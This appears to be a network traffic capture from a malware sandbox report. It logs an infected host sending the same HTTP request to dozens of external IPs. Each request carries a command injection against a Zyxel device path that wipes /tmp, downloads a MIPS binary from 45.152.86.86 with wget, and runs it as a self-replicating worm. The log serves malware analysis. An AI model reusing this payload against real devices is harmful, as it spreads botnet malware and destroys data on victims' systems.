                              Mar 31, 2024 08:42:01.275022984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8080192.168.2.134494272.33.251.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275063992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8081192.168.2.1333898211.74.48.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275099993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8082192.168.2.1352980170.218.175.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275119066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8083192.168.2.1358212186.31.238.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275182009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8084192.168.2.1352570178.127.188.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275209904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8085192.168.2.133286846.222.28.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275240898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8086192.168.2.1345504179.5.150.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275304079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8087192.168.2.1360016149.138.172.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275325060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8088192.168.2.135987620.148.166.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275371075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8089192.168.2.1341414147.14.28.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275396109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8090192.168.2.1360344189.239.135.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275427103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8091192.168.2.1348494131.190.246.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275451899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8092192.168.2.133657247.136.2.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275485039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8093192.168.2.133991243.9.6.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275516987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8094192.168.2.1358252124.131.93.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275557041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8095192.168.2.135188418.79.50.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275610924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8096192.168.2.1347202108.81.237.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275695086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8097192.168.2.1360362223.207.240.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275739908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8098192.168.2.135253238.137.137.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275769949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8099192.168.2.1339766222.168.123.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275800943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8100192.168.2.1338764222.243.138.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275829077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8101192.168.2.133829214.58.210.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275851011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8102192.168.2.1338154130.52.140.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275904894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8103192.168.2.1340018132.218.91.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275934935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8104192.168.2.1342222198.50.204.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.275988102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8105192.168.2.1338784141.239.250.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276057005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8106192.168.2.135438070.43.110.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276113033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8107192.168.2.1347104142.156.18.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276144981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8108192.168.2.1345824198.68.196.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276176929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8109192.168.2.1338952113.187.203.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276235104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8110192.168.2.1343644105.188.83.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276262999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8111192.168.2.1337608210.171.219.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276325941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8112192.168.2.135899870.179.53.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276365042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8113192.168.2.135425671.11.186.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276407957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8114192.168.2.1338406216.170.226.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276468992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8115192.168.2.133747235.14.249.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276494980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8116192.168.2.1349892221.236.113.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276530027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8117192.168.2.1360354219.104.66.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276555061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8118192.168.2.133451646.76.164.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276608944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8119192.168.2.1335912179.242.19.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276686907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8120192.168.2.1347224208.103.134.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276726007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8121192.168.2.1356814216.226.188.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276782036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8122192.168.2.133633262.37.175.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276820898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8123192.168.2.1358956211.251.84.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276843071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8124192.168.2.13525864.72.198.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276899099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8125192.168.2.135515439.112.84.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276949883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8126192.168.2.1350038163.119.53.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.276992083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8127192.168.2.1346354152.64.182.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.277029037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8128192.168.2.1337490103.176.76.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.277055979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8129192.168.2.1343034178.108.130.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.277106047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8130192.168.2.1334948195.168.168.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.277160883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8131192.168.2.1345026124.47.175.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.277213097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8132192.168.2.1341068140.36.17.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.281061888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8133192.168.2.134851073.156.230.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.281075001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8134192.168.2.1350290162.36.246.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268121958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8135192.168.2.135429298.80.47.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268173933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8136192.168.2.134550858.54.4.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268237114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8137192.168.2.135551671.6.154.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268281937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8138192.168.2.1345956107.106.79.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268364906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8139192.168.2.1360932126.9.92.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268419981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8140192.168.2.1342972212.189.60.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268480062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8141192.168.2.135770817.47.14.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268523932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8142192.168.2.133559814.116.178.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268556118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8143192.168.2.134162639.58.180.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268645048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8144192.168.2.133601486.215.62.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268683910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8145192.168.2.1347444207.68.23.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268762112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8146192.168.2.133763844.24.97.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268817902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8147192.168.2.1336100218.80.17.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:02.268865108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8148192.168.2.134428475.175.185.174443
                              TimestampBytes transferredDirectionData
